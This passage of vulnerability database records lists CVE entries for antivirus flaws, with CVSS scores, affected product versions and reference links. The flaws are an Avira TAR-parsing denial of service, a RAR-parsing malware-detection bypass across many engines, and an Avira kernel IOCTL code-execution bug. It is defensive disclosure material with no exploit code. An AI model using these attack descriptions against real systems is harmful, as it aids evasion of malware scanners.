      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
            "Vendor Advisory",
         ],
         url: "http://secunia.com/advisories/25417",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.011%5D%20-%20Avira%20Antivir%20Antivirus%20UPX%20parsing%20Divide%20by%20Zero%20Advisory.txt",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/archive/1/469880/100/0/threaded",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
         ],
         url: "http://www.securityfocus.com/bid/24187",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securitytracker.com/id?1018132",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.vupen.com/english/advisories/2007/1971",
      },
      {
         source: "cve@mitre.org",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34556",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
         ],
         url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://marc.info/?l=full-disclosure&m=118040810718045&w=2",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/36710",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
            "Vendor Advisory",
         ],
         url: "http://secunia.com/advisories/25417",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Vendor Advisory",
         ],
         url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.011%5D%20-%20Avira%20Antivir%20Antivirus%20UPX%20parsing%20Divide%20by%20Zero%20Advisory.txt",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/archive/1/469880/100/0/threaded",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
         ],
         url: "http://www.securityfocus.com/bid/24187",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securitytracker.com/id?1018132",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.vupen.com/english/advisories/2007/1971",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34556",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "NVD-CWE-Other",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2007-06-01 01:30
Modified
2024-11-21 00:32
Severity ?
Summary
Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed TAR archive.
References
cve@mitre.orghttp://forum.antivir-pe.de/thread.php?threadid=22528Patch
cve@mitre.orghttp://osvdb.org/36711
cve@mitre.orghttp://secunia.com/advisories/25417Patch, Vendor Advisory
cve@mitre.orghttp://www.nruns.com/advisories/%5Bn.runs-SA-2007.012%5D%20-%20Avira%20Antivir%20Antivirus%20TAR%20parsing%20Infinite%20Loop%20Advisory.txt
cve@mitre.orghttp://www.securityfocus.com/archive/1/470042/100/0/threaded
cve@mitre.orghttp://www.securityfocus.com/bid/24187
cve@mitre.orghttp://www.securityfocus.com/bid/24239
cve@mitre.orghttp://www.securitytracker.com/id?1018137
cve@mitre.orghttp://www.vupen.com/english/advisories/2007/1971
cve@mitre.orghttps://exchange.xforce.ibmcloud.com/vulnerabilities/34557
af854a3a-2127-422b-91ae-364da2661108http://forum.antivir-pe.de/thread.php?threadid=22528Patch
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/36711
af854a3a-2127-422b-91ae-364da2661108http://secunia.com/advisories/25417Patch, Vendor Advisory
af854a3a-2127-422b-91ae-364da2661108http://www.nruns.com/advisories/%5Bn.runs-SA-2007.012%5D%20-%20Avira%20Antivir%20Antivirus%20TAR%20parsing%20Infinite%20Loop%20Advisory.txt
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/archive/1/470042/100/0/threaded
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/bid/24187
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/bid/24239
af854a3a-2127-422b-91ae-364da2661108http://www.securitytracker.com/id?1018137
af854a3a-2127-422b-91ae-364da2661108http://www.vupen.com/english/advisories/2007/1971
af854a3a-2127-422b-91ae-364da2661108https://exchange.xforce.ibmcloud.com/vulnerabilities/34557
Impacted products
Vendor Product Version
avira antivir *
avira av_pack *



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:avira:antivir:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "445D730C-D41D-4014-8F47-42941554D65A",
                     versionEndIncluding: "7.04.00.23",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:av_pack:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "A9634F84-4E81-45F8-B040-9E08B30BF190",
                     versionEndIncluding: "7.03.00.08",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "Avira Antivir Antivirus before 7.03.00.09 allows remote attackers to cause a denial of service (infinite loop and CPU consumption) via a malformed TAR archive.",
      },
      {
         lang: "es",
         value: "El Antivirus Avira Antivir anterior al 7.03.00.09 permite a atacantes remotos provocar una denegación de servicio (bucle infinito y agotamiento de CPU) a través de un archivo TAR mal formado.",
      },
   ],
   evaluatorSolution: "This vulnerability is reportedly resolved in the following product version: 7.03.00.09",
   id: "CVE-2007-2973",
   lastModified: "2024-11-21T00:32:05.987",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "HIGH",
            cvssData: {
               accessComplexity: "LOW",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "COMPLETE",
               baseScore: 7.8,
               confidentialityImpact: "NONE",
               integrityImpact: "NONE",
               vectorString: "AV:N/AC:L/Au:N/C:N/I:N/A:C",
               version: "2.0",
            },
            exploitabilityScore: 10,
            impactScore: 6.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2007-06-01T01:30:00.000",
   references: [
      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
         ],
         url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/36711",
      },
      {
         source: "cve@mitre.org",
         tags: [
            "Patch",
            "Vendor Advisory",
         ],
         url: "http://secunia.com/advisories/25417",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.012%5D%20-%20Avira%20Antivir%20Antivirus%20TAR%20parsing%20Infinite%20Loop%20Advisory.txt",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/archive/1/470042/100/0/threaded",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/bid/24187",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/bid/24239",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securitytracker.com/id?1018137",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.vupen.com/english/advisories/2007/1971",
      },
      {
         source: "cve@mitre.org",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34557",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
         ],
         url: "http://forum.antivir-pe.de/thread.php?threadid=22528",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/36711",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         tags: [
            "Patch",
            "Vendor Advisory",
         ],
         url: "http://secunia.com/advisories/25417",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.nruns.com/advisories/%5Bn.runs-SA-2007.012%5D%20-%20Avira%20Antivir%20Antivirus%20TAR%20parsing%20Infinite%20Loop%20Advisory.txt",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/archive/1/470042/100/0/threaded",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/bid/24187",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/bid/24239",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securitytracker.com/id?1018137",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.vupen.com/english/advisories/2007/1971",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "https://exchange.xforce.ibmcloud.com/vulnerabilities/34557",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "NVD-CWE-Other",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2012-03-21 10:11
Modified
2024-11-21 01:36
Severity ?
Summary
The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence. NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations.
References
cve@mitre.orghttp://osvdb.org/80454
cve@mitre.orghttp://osvdb.org/80455
cve@mitre.orghttp://osvdb.org/80456
cve@mitre.orghttp://osvdb.org/80457
cve@mitre.orghttp://osvdb.org/80458
cve@mitre.orghttp://osvdb.org/80459
cve@mitre.orghttp://osvdb.org/80460
cve@mitre.orghttp://osvdb.org/80461
cve@mitre.orghttp://osvdb.org/80467
cve@mitre.orghttp://osvdb.org/80468
cve@mitre.orghttp://osvdb.org/80469
cve@mitre.orghttp://osvdb.org/80470
cve@mitre.orghttp://osvdb.org/80471
cve@mitre.orghttp://osvdb.org/80472
cve@mitre.orghttp://www.ieee-security.org/TC/SP2012/program.html
cve@mitre.orghttp://www.securityfocus.com/archive/1/522005
cve@mitre.orghttp://www.securityfocus.com/bid/52612
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80454
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80455
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80456
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80457
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80458
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80459
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80460
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80461
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80467
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80468
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80469
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80470
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80471
af854a3a-2127-422b-91ae-364da2661108http://osvdb.org/80472
af854a3a-2127-422b-91ae-364da2661108http://www.ieee-security.org/TC/SP2012/program.html
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/archive/1/522005
af854a3a-2127-422b-91ae-364da2661108http://www.securityfocus.com/bid/52612



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:ahnlab:v3_internet_security:2011.01.18.00:*:*:*:*:*:*:*",
                     matchCriteriaId: "0B91745E-EA83-4C70-BF2D-45A3678FA157",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:aladdin:esafe:7.0.17.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "5C6590DF-9164-4A76-ADEE-9110C5E3588E",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:alwil:avast_antivirus:4.8.1351.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "5A3A2FBE-3113-4CCB-8FCF-54CBD78FDF52",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:alwil:avast_antivirus:5.0.677.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "7877C5C9-C4CA-406F-A61A-EAFBA846A20D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:anti-virus:vba32:3.12.14.2:*:*:*:*:*:*:*",
                     matchCriteriaId: "2A0325DA-A137-41E0-BD5E-B892F2166749",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:antiy:avl_sdk:2.0.3.7:*:*:*:*:*:*:*",
                     matchCriteriaId: "38855431-9C17-41FE-8325-A3304DECAC92",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:authentium:command_antivirus:5.2.11.5:*:*:*:*:*:*:*",
                     matchCriteriaId: "192DFD98-11AA-4E7A-A1CB-53FC06FEB20F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avg:avg_anti-virus:10.0.0.1190:*:*:*:*:*:*:*",
                     matchCriteriaId: "4E62090C-AF41-4032-B9F7-78FEBDB4AAE1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:7.11.1.163:*:*:*:*:*:*:*",
                     matchCriteriaId: "62B656B8-A7FB-4451-8A32-CB7AB74165F0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:bitdefender:bitdefender:7.2:*:*:*:*:*:*:*",
                     matchCriteriaId: "24D7D7FA-20E9-4560-ABC6-154CD918E307",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:cat:quick_heal:11.00:*:*:*:*:*:*:*",
                     matchCriteriaId: "343D3F40-E028-4AEE-82A4-0A17C1D1ED13",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:clamav:clamav:0.96.4:*:*:*:*:*:*:*",
                     matchCriteriaId: "953C363B-AD5B-4C53-AAF0-AB6BA4040D74",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:comodo:comodo_antivirus:7424:*:*:*:*:*:*:*",
                     matchCriteriaId: "803A9A92-A984-43A8-8D27-C9A6FDB19A9D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:emsisoft:anti-malware:5.1.0.1:*:*:*:*:*:*:*",
                     matchCriteriaId: "488ED4D6-0A32-43D5-840C-F76919C41C45",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:eset:nod32_antivirus:5795:*:*:*:*:*:*:*",
                     matchCriteriaId: "673B999A-11D2-4AFF-9930-0C06E8BBAA7F",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:f-prot:f-prot_antivirus:4.6.2.117:*:*:*:*:*:*:*",
                     matchCriteriaId: "961708EB-3124-4147-A36D-BAD9241D0C88",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:f-secure:f-secure_anti-virus:9.0.16160.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "BB884937-53F0-4BB5-AA8F-1CCDCD1221D9",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:fortinet:fortinet_antivirus:4.2.254.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "1C36D1BA-DB17-4FE0-8D6E-BA5649AE3BF0",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:gdata-software:g_data_antivirus:21:*:*:*:*:*:*:*",
                     matchCriteriaId: "DA047323-54B7-460B-9AA0-88C3C4183218",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:ikarus:ikarus_virus_utilities_t3_command_line_scanner:1.1.97.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "1759C4A5-67D1-4722-954A-883694E57FAB",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:jiangmin:jiangmin_antivirus:13.0.900:*:*:*:*:*:*:*",
                     matchCriteriaId: "620DC756-B821-413C-A824-43C221E573AA",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:k7computing:antivirus:9.77.3565:*:*:*:*:*:*:*",
                     matchCriteriaId: "B27BD224-CB70-43D2-8B0D-9F229A646B82",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:kaspersky:kaspersky_anti-virus:7.0.0.125:*:*:*:*:*:*:*",
                     matchCriteriaId: "FD9BCB3B-0FE8-4716-ABC2-1DB89D330F56",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:mcafee:gateway:2010.1c:*:*:*:*:*:*:*",
                     matchCriteriaId: "18FC30B1-4FB3-4891-93FE-63A93E686EB3",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:mcafee:scan_engine:5.400.0.1158:*:*:*:*:*:*:*",
                     matchCriteriaId: "0BCE1228-61BE-4C10-898A-B8BDC5A71156",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:microsoft:security_essentials:2.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "7C382AA8-5E99-4669-9825-F5BBEEC12907",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:norman:norman_antivirus_\\&_antispyware:6.06.12:*:*:*:*:*:*:*",
                     matchCriteriaId: "81D01633-1000-425D-9026-59C50734956A",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:nprotect:nprotect_antivirus:2011-01-17.01:*:*:*:*:*:*:*",
                     matchCriteriaId: "D386C31F-6114-4A15-B0D5-15686D7EF8B8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:pandasecurity:panda_antivirus:10.0.2.7:*:*:*:*:*:*:*",
                     matchCriteriaId: "D95F8C32-D238-493F-A28D-8A588E8ADD13",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:pc_tools:pc_tools_antivirus:7.0.3.5:*:*:*:*:*:*:*",
                     matchCriteriaId: "410EEFDA-CFE6-4DDE-B661-BB01009B0E60",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:rising-global:rising_antivirus:22.83.00.03:*:*:*:*:*:*:*",
                     matchCriteriaId: "EF8ADA91-4042-4E1B-9F14-78023F24B137",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:sophos:sophos_anti-virus:4.61.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "0912E21E-1EEB-4ADD-958F-F8AEBBF7C5E6",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:symantec:endpoint_protection:11.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "E269D396-3A70-4C4B-9D79-CBBA75C280D8",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:trendmicro:housecall:9.120.0.1004:*:*:*:*:*:*:*",
                     matchCriteriaId: "B3C3D7B7-3DD1-417E-9488-A3B0F28F75E1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:trendmicro:trend_micro_antivirus:9.120.0.1004:*:*:*:*:*:*:*",
                     matchCriteriaId: "72379F97-0BCA-425A-92AE-9F336866FD07",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:virusbuster:virusbuster:13.6.151.0:*:*:*:*:*:*:*",
                     matchCriteriaId: "32C656A2-AAAC-494A-A981-A83144070857",
                     vulnerable: true,
                  },
               ],
               negate: false,
               operator: "OR",
            },
         ],
      },
   ],
   cveTags: [],
   descriptions: [
      {
         lang: "en",
         value: "The RAR file parser in ClamAV 0.96.4, Rising Antivirus 22.83.00.03, Quick Heal (aka Cat QuickHeal) 11.00, G Data AntiVirus 21, AVEngine 20101.3.0.103 in Symantec Endpoint Protection 11, Command Antivirus 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner 1.1.97.0, Emsisoft Anti-Malware 5.1.0.1, PC Tools AntiVirus 7.0.3.5, F-Prot Antivirus 4.6.2.117, VirusBuster 13.6.151.0, Fortinet Antivirus 4.2.254.0, Antiy Labs AVL SDK 2.0.3.7, K7 AntiVirus 9.77.3565, Trend Micro HouseCall 9.120.0.1004, Kaspersky Anti-Virus 7.0.0.125, Jiangmin Antivirus 13.0.900, Antimalware Engine 1.1.6402.0 in Microsoft Security Essentials 2.0, Sophos Anti-Virus 4.61.0, NOD32 Antivirus 5795, Avira AntiVir 7.11.1.163, Norman Antivirus 6.06.12, McAfee Anti-Virus Scanning Engine 5.400.0.1158, Panda Antivirus 10.0.2.7, McAfee Gateway (formerly Webwasher) 2010.1C, Trend Micro AntiVirus 9.120.0.1004, Comodo Antivirus 7424, Bitdefender 7.2, eSafe 7.0.17.0, F-Secure Anti-Virus 9.0.16160.0, nProtect Anti-Virus 2011-01-17.01, AhnLab V3 Internet Security 2011.01.18.00, AVG Anti-Virus 10.0.0.1190, avast! Antivirus 4.8.1351.0 and 5.0.677.0, and VBA32 3.12.14.2 allows user-assisted remote attackers to bypass malware detection via a RAR file with an initial MZ character sequence.  NOTE: this may later be SPLIT into multiple CVEs if additional information is published showing that the error occurred independently in different RAR parser implementations.",
      },
      {
         lang: "es",
         value: "El analizador de archivos RAR en ClamAV versión 0.96.4, Rising Antivirus versión 22.83.00.03, Quick Heal (también se conoce como Cat QuickHeal) versión 11.00, G Data AntiVirus versión 21, AVEngine versión 20101.3.0.103 en Symantec Endpoint Protection versión 11, Command Antivirus versión 5.2.11.5, Ikarus Virus Utilities T3 Command Line Scanner versión 1.1.97.0, Emsisoft Anti-Malware versión 5.1.0.1, PC Tools AntiVirus versión 7.0.3.5, F-Prot Antivirus versión 4.6.2.117, VirusBuster versión 13.6.151.0, Fortinet  antivirus versión 4.2.254.0, Antiy Labs AVL SDK versión 2.0.3.7, K7 AntiVirus versión 9.77.3565, Trend Micro HouseCall versión 9.120.0.1004, Kaspersky Antivirus versión 7.0.0.125, Jiangmin Antivirus versión 13.0.900, Antimalware Engine versión 1.1.6402.0 en Microsoft Security Essentials versión 2.0, Sophos Anti-Virus versión 4.61.0, NOD32 Antivirus versión 5795, Avira AntiVir versión 7.11.1.163, Norman Antivirus versión 6.06.12, McAfee Anti-Virus Scanning Engine versión 5.400.0.1158, Panda Antivirus versión 10.0.2.7, McAfee Gateway (anteriormente Webwasher) versión 2010.1C, Trend Micro AntiVirus versión 9.120.0.1004, Comodo Antivirus versión 7424, Bitdefender versión 7.2, eSafe versión 7.0.17.0, F-Secure Anti-Virus versión 9.0.16160.0, nProtect Versión antivirus 2011-01-17.01, AhnLab V3 Internet Security versión 2011.01.18.00, AVG Anti-Virus versión 10.0.0.1190, avast! antivirus versiones 4.8.1351.0 y 5.0.677.0, y VBA32 versión 3.12.14.2, permite a los atacantes remotos asistidos por el usuario omitir la detección de malware por medio de un archivo RAR con una inicial Secuencia de caracteres MZ. NOTA: esto puede ser más tarde SPLIT en varios CVE si se publica información adicional que muestra que el error se produjo de manera independiente en diferentes implementaciones de analizador RAR.",
      },
   ],
   id: "CVE-2012-1443",
   lastModified: "2024-11-21T01:36:59.753",
   metrics: {
      cvssMetricV2: [
         {
            acInsufInfo: false,
            baseSeverity: "MEDIUM",
            cvssData: {
               accessComplexity: "MEDIUM",
               accessVector: "NETWORK",
               authentication: "NONE",
               availabilityImpact: "NONE",
               baseScore: 4.3,
               confidentialityImpact: "NONE",
               integrityImpact: "PARTIAL",
               vectorString: "AV:N/AC:M/Au:N/C:N/I:P/A:N",
               version: "2.0",
            },
            exploitabilityScore: 8.6,
            impactScore: 2.9,
            obtainAllPrivilege: false,
            obtainOtherPrivilege: false,
            obtainUserPrivilege: false,
            source: "nvd@nist.gov",
            type: "Primary",
            userInteractionRequired: false,
         },
      ],
   },
   published: "2012-03-21T10:11:48.083",
   references: [
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80454",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80455",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80456",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80457",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80458",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80459",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80460",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80461",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80467",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80468",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80469",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80470",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80471",
      },
      {
         source: "cve@mitre.org",
         url: "http://osvdb.org/80472",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.ieee-security.org/TC/SP2012/program.html",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/archive/1/522005",
      },
      {
         source: "cve@mitre.org",
         url: "http://www.securityfocus.com/bid/52612",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80454",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80455",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80456",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80457",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80458",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80459",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80460",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80461",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80467",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80468",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80469",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80470",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80471",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://osvdb.org/80472",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.ieee-security.org/TC/SP2012/program.html",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/archive/1/522005",
      },
      {
         source: "af854a3a-2127-422b-91ae-364da2661108",
         url: "http://www.securityfocus.com/bid/52612",
      },
   ],
   sourceIdentifier: "cve@mitre.org",
   vulnStatus: "Modified",
   weaknesses: [
      {
         description: [
            {
               lang: "en",
               value: "CWE-264",
            },
         ],
         source: "nvd@nist.gov",
         type: "Primary",
      },
   ],
}

Vulnerability from fkie_nvd
Published
2009-08-13 16:30
Modified
2024-11-21 00:57
Severity ?
Summary
Avira AntiVir Premium, Premium Security Suite, AntiVir Professional, and AntiVir Personal - FREE allows local users to execute arbitrary code via a crafted IOCTL request that overwrites a kernel pointer.



{
   configurations: [
      {
         nodes: [
            {
               cpeMatch: [
                  {
                     criteria: "cpe:2.3:a:avira:antivir:-:-:premium:*:*:*:*:*",
                     matchCriteriaId: "60FC2C76-3B5F-418E-A2DD-9F5D2FBE4EF5",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir:6.35.00.00:*:*:*:*:*:*:*",
                     matchCriteriaId: "C23C179C-B50E-4F47-BFFA-85848131C99D",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_personal:*:*:*:*:*:*:*:*",
                     matchCriteriaId: "B38A75AF-D8B4-4B54-87E9-6EED562CAAC1",
                     vulnerable: true,
                  },
                  {
                     criteria: "cpe:2.3:a:avira:antivir_personal:*:*:premium:*:*:*:*:*",
                     matchCriteriaId: "BECD1C6B-EC0F-4203-BA12-F8B02472FF4C",
